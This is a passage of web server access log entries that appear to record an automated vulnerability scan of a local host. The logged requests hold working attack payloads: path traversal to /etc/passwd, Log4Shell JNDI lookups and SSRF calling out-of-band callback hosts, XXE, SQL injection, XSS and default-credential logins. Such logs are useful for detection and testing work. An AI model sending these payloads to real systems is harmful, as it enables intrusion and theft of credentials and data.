HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?c=../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/prometheus HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"--29N5EkztyEfT7yKkkLntiP6Fn3U\x0D\x0AContent-Disposition: form-data; name=\x2229N5Ej75IRL0tZaSoaNZ3m49Au3\x22; filename=\x2229N5Ej25pG37RjbaJ3tnZXZMF2a.xml\x22\x0D\x0AContent-Type: application/xml\x0D\x0A\x0D\x0A\x0D\x0A \x0D\x0A \x0D\x0A ALttP\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A 12345\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A--29N5EkztyEfT7yKkkLntiP6Fn3U\x0D\x0AContent-Disposition: form-data; name=\x2229N5EiF4oLViTZSgkQuFKfaqUUW\x22; filename=\x2229N5Eel6kN5O5cYJGyl4WJv5ea9.xml\x22\x0D\x0AContent-Type: application/xml\x0D\x0A\x0D\x0A\x0D\x0A ]>\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A <Extension>&xxe;</Extension>\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A--29N5EkztyEfT7yKkkLntiP6Fn3U--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /XMLCHART HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /base/static/c:/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/26 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebReport/ReportServer?op=fr_server&cmd=sc_getconnectioninfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /panel HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=wpda_duplicate_post_menu HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/view?filename=/windows/win.ini&base=../../../../../../../../../../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/Home/login/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.jenkins.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/config.exp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v2/keys/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /badging/badge_print_v0.php?tpl=../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s3cmd.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.vscode/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SecMail/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/27 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"username=admin&password=ixcache","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/userverify.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"{\x22user\x22:\x22admin\x22,\x22password\x22:\x22prom-operator\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /solr/admin/collections?action=$%7Bjndi:ldap://$%7BhostName%7D.ca2tuc8smpv1g2s80ca0odjbkwtt9bmpp.oast.pro/a%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/QueryComponent!Default.jspa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.travis.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5('CVE-2021-24750'),4--%20%22%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpmyadmin/setup/index.php?page=servers&mode=test&id=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_vti_bin/lists.asmx?WSDL HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_vti_inf.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/admin/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E& HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /service/error/sfdc_preauth.jsp?session=s&userid=1&server=http://ca2tuc8smpv1g2s80ca0nz8iw94d5i4hy.oast.pro%23.salesforce.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/device_graph_page.php?device_id=%22zlo%20onerror=alert(1)%20%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/28 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger-ui/swagger-ui.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"{\x22user\x22:\x22admin\x22,\x22password\x22:\x22admin\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /administrator/manifests/files/joomla.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/view?filename=/etc/passwd&base=../../../../../../../../../../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com/%2F.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cxwebclient/Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /setup/index.php?page=servers&mode=test&id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=wpo_wcpdf_options_page§ion=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/experimental/patternfile?order=id%3Bselect(md5('nuclei'))&page=0&page_size=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_vti_pvt/service.cnf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/sys HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/ HTTP/1.1","status":"403","body_bytes_sents":"187","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /eam/vib?id=/etc/issue 